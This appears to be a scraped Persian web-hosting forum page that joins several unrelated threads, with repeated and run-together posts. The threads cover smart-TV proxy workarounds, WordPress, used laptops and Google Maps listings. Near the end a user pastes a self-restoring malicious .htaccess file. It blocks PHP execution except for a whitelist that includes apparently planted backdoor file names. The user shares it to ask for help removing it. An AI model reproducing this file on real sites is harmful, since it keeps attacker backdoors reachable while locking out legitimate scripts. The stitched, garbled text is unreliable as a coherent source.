کسی نظری نداشت؟پرداخت هزینه های ارزی هاست و دامین از کانادا چیز خوبی هست بگم اون دوستم تو کانادا روش فکر کنه؟
یادم نبود pdanet باید روی دستگاه اندرویدی هم نصب بشه که اینجا مشکل نصب برنامه روی تلویزیون هست.مرورگرش دسترسی نداره، امکان تعریف دسترسی هم ندارد!
مونتاژ ایران که ۹۹٪ هست،
Pdanet رو نصب کردم ولی فرصت نشد تست کنم،
استور داخلی اگر داشت که اینقدر مشقت نداشت! کل این داستان های برای یه فیلیمو هست
همیشه برام سوال بود واقعا کسی فیلیمو و امثالهم می بینم! ولی الان می بینم خانواده خودم متهم ردیف اولن
باید پرمیشن ها هم می اورد. اجازه دسترسی به حافظه و نصب برنامه از مرورگرولی منوها اوکی هست و تنظیمات پروکسی و غیره تکمیل هست،
نه دیگه ، فایل منیجر نداره، پلی استور فیلتره، مرورگر دسترسی ذخیره در حافظه نداره، امکان دسترسی دادن هم نداره!!روش میتونی فایل APK نصب کنی؟ یک برنامه هست بنام socksdroid که پراکسی socks5 رو بهVPN تبدیل میکنه.
یک سرور پراکسی روی کامپیوتر لوکال راه اندازی کن، بعد از ویندوز هاتاسپات کن به این، بعد با socksdroid به VP-N وصل شو و به گوگل پلی دسترسی خواهی داشت.
این برنامه socksdroid رایگان و اوپنسورس هست از گیتهاب میتونید دانلود کنی... من خودم همیشه همنطوری میکنم
گارانتی مال ما ایرانکو هست، گارانتی که خودش میخواست ۷۰۰ تومن بگیره واسه دوتا نرم افزار !!یادم نبود pdanet باید روی دستگاه اندرویدی هم نصب بشه که اینجا مشکل نصب برنامه روی تلویزیون هست.
تلویزیون هوشمند که نصب برنامه نداشته باشه و حتی فیلیمو هم پیش فرض روش نباشه!! نوبره. با پشتیبانی مادیران تماس بگیر.
مال ما 3 ماه اشتراک رایگان هم داشت.
باید پرمیشن ها هم می اورد. اجازه دسترسی به حافظه و نصب برنامه از مرورگر
احتمالا توی فیلترینگ سطح dns گیر میکنهکلا ماجرا یکمی عجیب شده!
امروز با کلی داستان خلاصه فیلترشکن رو از طریق لپ تاپ شر کردم رو تی وی و جواب داد و آی پی گرفت ولی در کمال تعجب سایتهای مسدود رو باز نکرد !
یعنی آی پی فیلترشکن رو میگیره ولی نمیتونه سایتهای فیلتر رو باز کنه!!
Discourseبچه ها اسکریپت فروم اینا چیه؟
hxxps://forums.7ho.st
روی ۲۰ تا مقاله چی بنویسیخسته کننده ترین کار برام راه اندازی وردپرسه
یعنی حاضرم روی 20 تا مقاله بنویسم ولی سایت راه اندازی نکنم
این تنظیمات اولیه و افزونه ها و قالب ها واقعا خستم میکنه
احتمالا منظور جواد "روزی" ۲۰ تا مقاله هستروی ۲۰ تا مقاله چی بنویسی
pccenter توی دست دوم ها بد نیست.برا خرید لپ تاپ استوک کدوم سایت معتبره؟
نیک پرداز
pccenter توی دست دوم ها بد نیست.
هم قیمت هم تعهد
منم دقیقا همینطوردوستان
توی مپ گوگل میخوام یه کسبو کار رو ثبت کنم (یدک کش خودرو)
سایت داره، تلفن داره، آدرس داره، تصویر داره و تمامی فیلدها رو به درستی پر میکنم
تا الان نزدیک ۲۰ بار ارسال کردم اما هربار ظرف ۵ ثانیه پیام عدم پذیرش رو میده
با اسامی مختلف زدم، با تصاویر واقعی از اون کسبو کار که حتی شماره تلفن و اسمش هم روی یدک کش بوده و حتی انگلیسی هم زدم اما هیچ کدومو قبول نمیکنه
با اکانت های مختلف حتی
چیکارش کنم؟
مشاهده پیوست 1328619
منم برای مغازه یکی از بستگان شماره تلفن اضافه کردم چند بار not accepted زددوستان
توی مپ گوگل میخوام یه کسبو کار رو ثبت کنم (یدک کش خودرو)
سایت داره، تلفن داره، آدرس داره، تصویر داره و تمامی فیلدها رو به درستی پر میکنم
تا الان نزدیک ۲۰ بار ارسال کردم اما هربار ظرف ۵ ثانیه پیام عدم پذیرش رو میده
با اسامی مختلف زدم، با تصاویر واقعی از اون کسبو کار که حتی شماره تلفن و اسمش هم روی یدک کش بوده و حتی انگلیسی هم زدم اما هیچ کدومو قبول نمیکنه
با اکانت های مختلف حتی
چیکارش کنم؟
مشاهده پیوست 1328619
<FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch '^(index.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|wp-blog-header.php|wp-config-sample.php|wp-links-opml.php|wp-login.php|wp-settings.php|wp-trackback.php|wp-activate.php|wp-comments-post.php|wp-cron.php|wp-load.php|wp-mail.php|wp-signup.php|xmlrpc.php|edit-form-advanced.php|link-parse-opml.php|ms-sites.php|options-writing.php|themes.php|admin-ajax.php|edit-form-comment.php|link.php|ms-themes.php|plugin-editor.php|admin-footer.php|edit-link-form.php|load-scripts.php|ms-upgrade-network.php|admin-functions.php|edit.php|load-styles.php|ms-users.php|plugins.php|admin-header.php|edit-tag-form.php|media-new.php|my-sites.php|post-new.php|admin.php|edit-tags.php|media.php|nav-menus.php|post.php|admin-post.php|export.php|media-upload.php|network.php|press-this.php|upload.php|async-upload.php|menu-header.php|options-discussion.php|privacy.php|user-edit.php|menu.php|options-general.php|profile.php|user-new.php|moderation.php|options-head.php|revision.php|users.php|custom-background.php|ms-admin.php|options-media.php|setup-config.php|widgets.php|custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php)$'>
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
تیکت به هاستینگ بزن بگو اسکن کنن برات. حل میشهاین ویروس httacess بیچارمون کرده هی برای خودش یک سری صفحات میبنده ! پاکش میکنم دوباره ویرایش میشه
کسی تجربه ای داره چطور از شرش خلاص بشم؟